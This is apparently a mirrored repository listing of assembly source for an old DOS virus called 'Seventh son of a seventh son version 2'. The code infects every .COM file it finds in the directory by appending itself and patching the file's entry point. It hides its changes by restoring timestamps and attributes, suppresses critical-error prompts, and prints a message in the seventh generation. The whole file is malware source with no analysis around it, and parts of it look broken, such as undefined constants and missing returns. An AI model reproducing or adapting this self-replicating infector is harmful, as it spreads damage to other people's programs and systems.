mirror of
synced 2025-02-22 22:53:41 +00:00
232 lines
7.5 KiB
232 lines
7.5 KiB
;* Seventh son of a seventh son version 2
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
FILELEN equ end - start
MINTARGET equ 1000
org 100h
;* Dummy program (infected)
begin: db 4Dh
jmp start
;* Begin of the virus
start: call start2
start2: pop bp
sub bp,0103h
lea si,[bp+offset begbuf-4] ;restore begin of file
mov di,0100h
mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
mov dx,offset ni24 - 4 ;set new int24 vector
add dx,bp
mov ax,2524h
int 21
lea dx,[bp+offset end] ;set new DTA adres
mov ah,1Ah
int 21
add dx,1Eh
mov word ptr [bp+offset nameptr-4],dx
lea si,[bp+offset grandfather-4] ;check generation
cmp [si],0606h
jne verder
lea dx,[bp+offset sontxt-4] ;7th son of a 7th son!
mov ah,09h
int 21
verder: mov ax,[si] ;update generations
xchg ah,al
xor al,al
mov [si],ax
lea dx,[bp+offset filename-4] ;find first COM-file
xor cx,cx
mov ah,4Eh
int 21
infloop: mov dx,word ptr [bp+offset nameptr-4]
call infect
mov ah,4Fh ;find next file
int 21
jnc infloop
pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
push cs
push cs
pop ds
pop es
mov ax,0100h ;put old start-adres on stack
push ax
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
infect: cld
mov ax,4300h ;ask attributes
int 21
push cx
xor cx,cx ;clear flags
call setattr
jc return1
mov ax,3D02h ;open the file
int 21
jc return1
xchg bx,ax
mov ax,5700h ;get file date & time
int 21
push cx
push dx
mov cx,4 ;read begin of file
lea dx,[bp+offset begbuf-4]
mov ah,3fh
int 21
mov al,byte ptr [bp+begbuf-4] ;already infected?
cmp al,4Dh
je return2
cmp al,5Ah ;or a weird EXE?
je return2
call endptr ;get file-length
cmp ax,MAXTARGET ;check length of file
jnb return2
jbe return2
push ax
mov cx,FILELEN ;write program to end of file
lea dx,[bp+offset start-4]
mov ah,40h
int 21
cmp ax,cx ;are all bytes written?
pop ax
jnz return2
sub ax,4 ;calculate new start-adres
mov word ptr [bp+newbeg-2],ax
call beginptr ;write new begin of file
mov cx,4
lea dx,[bp+offset newbeg-4]
mov ah,40h
int 21
inc byte ptr [si] ;number of next son
return2: pop dx ;restore file date & time
pop cx
mov ax,5701h
int 21
mov ah,3Eh ;close the file
int 21
return1: pop cx ;restore file-attribute
; call setattr
; ret
;* Changes file-attributes
setattr: mov dx,word ptr [bp+offset nameptr-4]
mov ax,4301h
int 21
;* Subroutines for file-pointer
beginptr: mov ax,4200h ;go to begin of file
jmp short ptrvrdr
endptr: mov ax,4202h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
int 21
;* Interupt handler 24
ni24: mov al,03
;* Data
begbuf db 0CDh, 20h, 0, 0
newbeg db 4Dh, 0E9h, 0, 0
nameptr dw ?
sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$'
grandfather db 0
father db 0
filename db '*.COM',0
cseg ends
end begin